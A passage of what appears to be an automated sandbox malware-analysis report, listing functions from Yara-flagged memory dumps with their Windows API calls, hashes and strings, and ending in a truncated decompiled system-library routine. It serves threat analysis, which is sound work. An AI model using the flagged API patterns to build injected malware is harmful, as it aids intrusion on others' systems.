                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 020AFFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2376022456.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376017076.0000000002090000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376136233.0000000002180000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376141520.0000000002190000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376146433.0000000002194000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376150887.0000000002197000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376156087.00000000021A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376198013.0000000002200000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                                                                          • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 020AFC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2376022456.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376017076.0000000002090000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376136233.0000000002180000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376141520.0000000002190000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376146433.0000000002194000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376150887.0000000002197000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376156087.00000000021A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376198013.0000000002200000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                                                                          • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 020AFD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2376022456.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376017076.0000000002090000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376136233.0000000002180000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376141520.0000000002190000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376146433.0000000002194000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376150887.0000000002197000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376156087.00000000021A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376198013.0000000002200000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                                                                          • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 020AFDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2376022456.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376017076.0000000002090000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376136233.0000000002180000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376141520.0000000002190000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376146433.0000000002194000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376150887.0000000002197000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376156087.00000000021A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376198013.0000000002200000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                                                                          • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00096EE0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • Sleep.KERNELBASE(000007D0), ref: 00096F88
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                                          • String ID: net.dll$wininet.dll
                                                                                                                                                                                                          • API String ID: 3472027048-1269752229
                                                                                                                                                                                                          • Opcode ID: d85d72153ef24544e4ceac26b91ad447824e9e588f30e7a06b14d59622c481bf
                                                                                                                                                                                                          • Instruction ID: 843388dbfa745a222a99e9a4e6401c03e08835f2cd5b154a8125b0c7ceaf47f7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d85d72153ef24544e4ceac26b91ad447824e9e588f30e7a06b14d59622c481bf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 283190B1602704ABCB25DF68D8B1FABB7F8FB48700F00842DF61A9B241D771A545DBA0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00096ED6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 79sleepCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • Sleep.KERNELBASE(000007D0), ref: 00096F88
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                                          • String ID: net.dll$wininet.dll
                                                                                                                                                                                                          • API String ID: 3472027048-1269752229
                                                                                                                                                                                                          • Opcode ID: 947af4a8ced936e498a6adc0c3ebe30dac9dde1033bcb30055a47e28b3b9b6f4
                                                                                                                                                                                                          • Instruction ID: d9aaf52ed4591530312b117df9abf3308759e95d7652074f2f0be0e915a92ce6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 947af4a8ced936e498a6adc0c3ebe30dac9dde1033bcb30055a47e28b3b9b6f4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA21D0B1605300ABCB21DF68D8A1FABBBB4BF48700F04806DF61A9B242D371A445DBA0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 000984D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 000984FD
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                          • String ID: .z`
                                                                                                                                                                                                          • API String ID: 3298025750-1441809116
                                                                                                                                                                                                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                                                                          • Instruction ID: 1c755d4cbfb66d039e8ff558d84dc61b7497881273cc45cb809a5fb29154940b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AE01AB12002046BDB14DF59CC45EA777ACAF88750F018554F90857242CA30E910CAF0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00087260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000872BA
                                                                                                                                                                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000872DB
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessagePostThread
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1836367815-0
                                                                                                                                                                                                          • Opcode ID: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                                                                                                                                                          • Instruction ID: 5aa3b97d6aa85e08f00fefe8b5f0a767f3611af8853c18f5fb742d2c041b7cc6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B001D631A8022C77EB20B7949C43FFE776CAB40B50F150119FF44BA1C2E694AA0687F6
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00087233, Relevance: 3.0, APIs: 2, Instructions: 41threadwindowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000872BA
                                                                                                                                                                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000872DB
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessagePostThread
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1836367815-0
                                                                                                                                                                                                          • Opcode ID: a48fa8f18b87730ac951628d4debb36c2350a33053462d418bcc864ffe104e1f
                                                                                                                                                                                                          • Instruction ID: 22567a29f290834b2922b9dda350af39c162fe1438e00b85fcf0ff571019ee03
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a48fa8f18b87730ac951628d4debb36c2350a33053462d418bcc864ffe104e1f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7AF0E931A841283AE73066545C03FFEB798BB80B11F24412AFE84AA1C2E691580587E1
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00097005, Relevance: 1.6, APIs: 1, Instructions: 118threadCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008CCD0,?,?), ref: 0009704C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                                                                          • Opcode ID: a147266c3b11a3828ef28e38813cc07779aa21fca741a0448e6d1dbd002c37d9
                                                                                                                                                                                                          • Instruction ID: 155cbd13674d9b84515fed54beb99f84d2a07ae17a382cd1e9ce149db01630ce
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a147266c3b11a3828ef28e38813cc07779aa21fca741a0448e6d1dbd002c37d9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7441BFB2211705ABDB25DB78CCA1FE7B3E8BF84384F444519F61A97282D771B815CBA0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00089B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00089B92
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Load
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2234796835-0
                                                                                                                                                                                                          • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                                                                          • Instruction ID: 9dad75656dc95706c574d85ceed14ede952760ce02333afafa4db01abbe2434c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10011EB5E0020DBBDF10EAE4ED42FEDB7B8AB54308F0441A5A90897242F631EB14DB91
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00098540, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00098594
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateInternalProcess
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2186235152-0
                                                                                                                                                                                                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                                                                          • Instruction ID: 501684698dff5584f9e1b6135d593b1e47e90fb512b1126792af57a654e4258c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1701AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258FA0D97241CA30E851CBA4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00098621, Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008CFA2,0008CFA2,?,00000000,?,?), ref: 00098660
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3899507212-0
                                                                                                                                                                                                          • Opcode ID: f3d0d4816f2cdbc92c373190ca66973c238335d4b5fe0e9a71cc65d7bc131487
                                                                                                                                                                                                          • Instruction ID: b0f36824f5d8e35cef9c2a82a682be73b0c69788e45fb7e08a70f1fd3060065f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3d0d4816f2cdbc92c373190ca66973c238335d4b5fe0e9a71cc65d7bc131487
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7EF0CDB22002086FDB24DFA9DC80EEB77ADEF89310F058649FA4D97201C930E900CBB0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00097010, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008CCD0,?,?), ref: 0009704C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                                                                          • Opcode ID: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
                                                                                                                                                                                                          • Instruction ID: 602cbd25aa90777f6ffd2d2c4f7ed2a31915acd43363c6c9d3d8ef850d21b4c9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2AE06D333902043AE73065999C02FE7B39C8B81B60F540026FA0DEB2C2D595F80156A4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 000872E4, Relevance: 1.5, APIs: 1, Instructions: 25threadwindowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000872DB
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessagePostThread
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1836367815-0
                                                                                                                                                                                                          • Opcode ID: ea492a0dd7fa0d4bcf416ebe9217e1cd75a044e1415e850f8fd52b4d56661e89
                                                                                                                                                                                                          • Instruction ID: 75e3722d16724f44db499cc065470b610a53af369938ce701ccd1ea50e397280
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea492a0dd7fa0d4bcf416ebe9217e1cd75a044e1415e850f8fd52b4d56661e89
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76E02B2538415825F7207698EC02FFE3788F762B62F58026EF9C8C62C3D585510D57F1
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00098630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008CFA2,0008CFA2,?,00000000,?,?), ref: 00098660
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3899507212-0
                                                                                                                                                                                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                                                                          • Instruction ID: 6a27dad26c2d5faf9d449469d3e8af6ec1307e237583b6fb8baac24e736a657b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37E01AB12002086BDB10DF49CC85EE737ADAF89650F018554FA0857242C930E8108BF5
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0008D410, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,00087C63,?), ref: 0008D43B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                                                                          • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                                                                                                                          • Instruction ID: 746999c3a9da8dd47fd5d6713711b0bf696e9ec5616cd02b68266e171eb19b41
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88D0A7717503043BEA10FBA89C03F6633CC6B54B00F494064F949D73C3D960F9004561
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                          Function 020D8788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                                          			E020D8788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E020D8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E020BE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E020D718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E020D8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E020BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E020D718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E020D8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E020D8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E020D8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E020BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E020BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E020D718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E020BE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
